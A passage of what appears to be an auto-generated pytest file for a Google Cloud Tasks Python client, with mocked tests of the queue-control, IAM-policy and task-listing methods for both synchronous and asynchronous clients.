await client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_purge_queue_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.purge_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.purge_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_purge_queue_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.purge_queue(
cloudtasks.PurgeQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_purge_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.purge_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.purge_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_purge_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.purge_queue(
cloudtasks.PurgeQueueRequest(), name="name_value",
)
def test_pause_queue(
transport: str = "grpc", request_type=cloudtasks.PauseQueueRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.pause_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
app_engine_http_queue=target.AppEngineHttpQueue(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PauseQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_pause_queue_from_dict():
test_pause_queue(request_type=dict)
@pytest.mark.asyncio
async def test_pause_queue_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.PauseQueueRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.pause_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
)
)
response = await client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_pause_queue_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PauseQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.pause_queue), "__call__") as call:
call.return_value = queue.Queue()
client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_pause_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PauseQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.pause_queue), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
await client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_pause_queue_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.pause_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.pause_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_pause_queue_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.pause_queue(
cloudtasks.PauseQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_pause_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.pause_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.pause_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_pause_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.pause_queue(
cloudtasks.PauseQueueRequest(), name="name_value",
)
def test_resume_queue(
transport: str = "grpc", request_type=cloudtasks.ResumeQueueRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.resume_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
app_engine_http_queue=target.AppEngineHttpQueue(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ResumeQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_resume_queue_from_dict():
test_resume_queue(request_type=dict)
@pytest.mark.asyncio
async def test_resume_queue_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.ResumeQueueRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.resume_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
type=queue.Queue.Type.PULL,
)
)
response = await client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
assert response.type == queue.Queue.Type.PULL
def test_resume_queue_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ResumeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.resume_queue), "__call__") as call:
call.return_value = queue.Queue()
client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_resume_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ResumeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.resume_queue), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
await client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_resume_queue_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.resume_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.resume_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_resume_queue_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.resume_queue(
cloudtasks.ResumeQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_resume_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.resume_queue), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.resume_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_resume_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.resume_queue(
cloudtasks.ResumeQueueRequest(), name="name_value",
)
def test_get_iam_policy(
transport: str = "grpc", request_type=iam_policy.GetIamPolicyRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy.Policy(version=774, etag=b"etag_blob",)
response = client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy.GetIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, policy.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_get_iam_policy_from_dict():
test_get_iam_policy(request_type=dict)
@pytest.mark.asyncio
async def test_get_iam_policy_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy.GetIamPolicyRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_iam_policy), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
policy.Policy(version=774, etag=b"etag_blob",)
)
response = await client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, policy.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_get_iam_policy_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy.GetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_iam_policy), "__call__") as call:
call.return_value = policy.Policy()
client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_iam_policy_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy.GetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_iam_policy), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy.Policy())
await client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
def test_get_iam_policy_from_dict():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy.Policy()
response = client.get_iam_policy(
request={
"resource": "resource_value",
"options": options.GetPolicyOptions(requested_policy_version=2598),
}
)
call.assert_called()
def test_get_iam_policy_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy.Policy()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].resource == "resource_value"
def test_get_iam_policy_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_iam_policy(
iam_policy.GetIamPolicyRequest(), resource="resource_value",
)
@pytest.mark.asyncio
async def test_get_iam_policy_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_iam_policy), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = policy.Policy()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy.Policy())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].resource == "resource_value"
@pytest.mark.asyncio
async def test_get_iam_policy_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_iam_policy(
iam_policy.GetIamPolicyRequest(), resource="resource_value",
)
def test_set_iam_policy(
transport: str = "grpc", request_type=iam_policy.SetIamPolicyRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy.Policy(version=774, etag=b"etag_blob",)
response = client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy.SetIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, policy.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_set_iam_policy_from_dict():
test_set_iam_policy(request_type=dict)
@pytest.mark.asyncio
async def test_set_iam_policy_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy.SetIamPolicyRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.set_iam_policy), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
policy.Policy(version=774, etag=b"etag_blob",)
)
response = await client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, policy.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_set_iam_policy_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy.SetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.set_iam_policy), "__call__") as call:
call.return_value = policy.Policy()
client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_set_iam_policy_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy.SetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.set_iam_policy), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy.Policy())
await client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
def test_set_iam_policy_from_dict():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy.Policy()
response = client.set_iam_policy(
request={
"resource": "resource_value",
"policy": policy.Policy(version=774),
}
)
call.assert_called()
def test_set_iam_policy_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy.Policy()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.set_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].resource == "resource_value"
def test_set_iam_policy_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.set_iam_policy(
iam_policy.SetIamPolicyRequest(), resource="resource_value",
)
@pytest.mark.asyncio
async def test_set_iam_policy_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.set_iam_policy), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = policy.Policy()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy.Policy())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.set_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].resource == "resource_value"
@pytest.mark.asyncio
async def test_set_iam_policy_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.set_iam_policy(
iam_policy.SetIamPolicyRequest(), resource="resource_value",
)
def test_test_iam_permissions(
transport: str = "grpc", request_type=iam_policy.TestIamPermissionsRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy.TestIamPermissionsResponse(
permissions=["permissions_value"],
)
response = client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy.TestIamPermissionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, iam_policy.TestIamPermissionsResponse)
assert response.permissions == ["permissions_value"]
def test_test_iam_permissions_from_dict():
test_test_iam_permissions(request_type=dict)
@pytest.mark.asyncio
async def test_test_iam_permissions_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy.TestIamPermissionsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy.TestIamPermissionsResponse(permissions=["permissions_value"],)
)
response = await client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, iam_policy.TestIamPermissionsResponse)
assert response.permissions == ["permissions_value"]
def test_test_iam_permissions_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy.TestIamPermissionsRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._transport.test_iam_permissions), "__call__"
) as call:
call.return_value = iam_policy.TestIamPermissionsResponse()
client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_test_iam_permissions_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy.TestIamPermissionsRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.test_iam_permissions), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy.TestIamPermissionsResponse()
)
await client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
def test_test_iam_permissions_from_dict():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy.TestIamPermissionsResponse()
response = client.test_iam_permissions(
request={
"resource": "resource_value",
"permissions": ["permissions_value"],
}
)
call.assert_called()
def test_test_iam_permissions_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy.TestIamPermissionsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.test_iam_permissions(
resource="resource_value", permissions=["permissions_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].resource == "resource_value"
assert args[0].permissions == ["permissions_value"]
def test_test_iam_permissions_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.test_iam_permissions(
iam_policy.TestIamPermissionsRequest(),
resource="resource_value",
permissions=["permissions_value"],
)
@pytest.mark.asyncio
async def test_test_iam_permissions_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy.TestIamPermissionsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy.TestIamPermissionsResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.test_iam_permissions(
resource="resource_value", permissions=["permissions_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].resource == "resource_value"
assert args[0].permissions == ["permissions_value"]
@pytest.mark.asyncio
async def test_test_iam_permissions_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.test_iam_permissions(
iam_policy.TestIamPermissionsRequest(),
resource="resource_value",
permissions=["permissions_value"],
)
def test_list_tasks(transport: str = "grpc", request_type=cloudtasks.ListTasksRequest):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListTasksResponse(
next_page_token="next_page_token_value",
)
response = client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListTasksRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListTasksPager)
assert response.next_page_token == "next_page_token_value"
def test_list_tasks_from_dict():
test_list_tasks(request_type=dict)
@pytest.mark.asyncio
async def test_list_tasks_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.ListTasksRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_tasks), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListTasksResponse(next_page_token="next_page_token_value",)
)
response = await client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
